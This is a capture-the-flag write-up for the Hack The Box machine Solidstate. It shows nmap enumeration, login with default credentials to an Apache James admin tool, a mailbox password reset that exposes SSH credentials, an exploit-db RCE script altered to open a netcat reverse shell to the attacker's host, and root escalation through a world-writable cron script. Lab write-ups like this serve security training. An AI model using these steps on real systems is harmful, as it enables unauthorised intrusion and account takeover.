Hack The Box - Solidstate

5 minute read

SolidstateImage


Summary


This machine contained a fairly straightforward SMTP vulnerability which didn’t even need to be exploited to fully compromise the machine. It is an essential machine to understand for anyone wanting to sit the current OSCP exam due to the elements contained within it.

Gaining Access

  • Locate James Remote Administration Tool and login
  • Reset email credentials
  • Locate SSH credentials in Mindy’s email
  • Exploit Apache James Server 2.3.2 RCE
  • SSH in as Mindy

Elevating Privileges

  • Locate tmp.py file
  • Use scheduled task to modify root password
  • Login as root user

Write-up


First off I enumerated open ports.

root@mintsec:~/Desktop/machines/Solidstate# nmap -sC -sV -oA nmap 10.10.10.51
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (EdDSA)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.12.121 [10.10.12.121]),
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

This highlighted an SMTP server which was running, and a website which was of interest. Looking at the website revealed nothing more than a contact form, and a brief attempt at enumerating directories lead nowhere.

SolidstateWebpage

Wanting to ensure I covered off all bases I ran a full nmap scan to see if there was anything I’d missed.

root@mintsec:~/Desktop/machines/Solidstate# nmap -p- -T5 -oA nmapfull 10.10.10.51
PORT     STATE SERVICE 
22/tcp   open  ssh
25/tcp   open  smtp  
80/tcp   open  http
110/tcp  open  pop3    
119/tcp  open  nntp 
4555/tcp open  rsip 

Locate James Remote Administration Tool and login

4555/tcp open rsip

This revealed an open port which nmap thought was rsip. In the context of other services this seemed unusual, so I connected to it with netcat.

root@mintsec:~/Desktop/machines/Solidstate# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password

Interesting, it was instead a remote admin service, from here attempting some common username and password combinations manually revealed some usable credentials.

root
root

Reset email credentials

Looking further into what ‘JAMES’ was, I found it stood for thew Java Apache Mail Enterprise Server, and as it turns out the credentials I’d guessed were also the default credentials used for the JAMES Remote Administration Tool, poor form.

Looking at the available commands on this service, I utilised the “listusers” function to determine who had an email account.

listusers
user: james
user: thomas
user: john
user: mindy
user: mailadmin

From here I was able to reset the password of any of these users. By resetting Mindy’s password I was then able to view their emails from within Thunderbird.

setpassword mindy mindypassword

Locate SSH credentials in Mindy’s email

By opening thunderbird, and setting up a new account using the email [email protected] I was able to view Mindy’s emails. Thunderbird resembled the below configuration.

Your name: mindy
Email address: [email protected]
Password: mindypassword

Contained within this email was SSH credentials for mindy.

PasswordEmail

  • mindy
  • P@55W0rd1!2@

Exploit Apache James Server 2.3.2 RCE

Of interest was that the email stated access was restricted. Upon logging in through SSH, I found I’d got a restricted bash (rbash) shell with limited capabilities.

ssh [email protected]
P@55W0rd1!2@
cd

-rbash: cd: restricted

To bypass this I had to search for and exploit a vulnerability in the JAMES software itself, first I had to find an appropriate payload.

root@mintsec:~/Desktop/machines/Solidstate# searchsploit "james"
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache James Server 2.2 - SMTP Denial  | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Com | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0. | exploits/windows/remote/944.c
--------------------------------------- ----------------------------------------

Using the -m parameter I was able to download the RCE payload found.

searchsploit -m 35513.py

Viewing this gave some context as to how the exploit works.

root@mintsec:~/Desktop/machines# cat 35513.py 
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

From here I was able to modify the payload to connect back to my machine by changing the payload parameter.

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = 'nc -e /bin/bash 10.10.12.121 8080' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

At this point I just needed to setup a listener, run the exploit, and then SSH into the machine to trigger the payload.

Setup a listener:

nc -nlvp 8080

Run the exploit:

python 35513.py 10.10.10.51

SSH into the machine:

ssh [email protected]
P@55W0rd1!2@

Success, I had a way of getting an unrestricted shell which provided access to this machine. One last thing I wanted to do was upgrade this to a fully (well mostly) interactive TTY shell. Methods to do this are outlined on Ropnop’s Blog

python -c 'import pty; pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$

Interactive shell, including access to the user.txt file.

Gaining Access


User.txt: 914d0…6fd75


Locate tmp.py file

Looking into the /opt directory I located a tmp.py file which was onwed by root, but writeable by everyone. A useful 1-liner to help find this is shown below:

find / -user root -writable -type f -not -path "/proc/*"  2>/dev/null

Viewing this file gave some context as to what it was used for.

cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/*')
except:
     sys.exit()

Use scheduled task to modify root password

Based on this I could infer it was used to remove anything placed in the temporary directory. Given this was owned by root it is quite possible this would execute on a cron schedule and could serve as a privesc vector. I modified the python script to change the root password to ‘JPMinty’ as shown below.

#!/usr/bin/env python
import os
import sys
os.system('echo root:JPMinty | /usr/sbin/chpasswd')

Login as root user

At this point I was able to use ‘su’ to elevate to root privileges.

su
JPMinty

And with that I’d fully compromised the system.

Elevating Privileges


root.txt: b4c97…c87c9


Final Notes

At the time of revising this, the machine did not have a rating matrix available. Feel free to reach out and provide any feedback or let me know if this helped.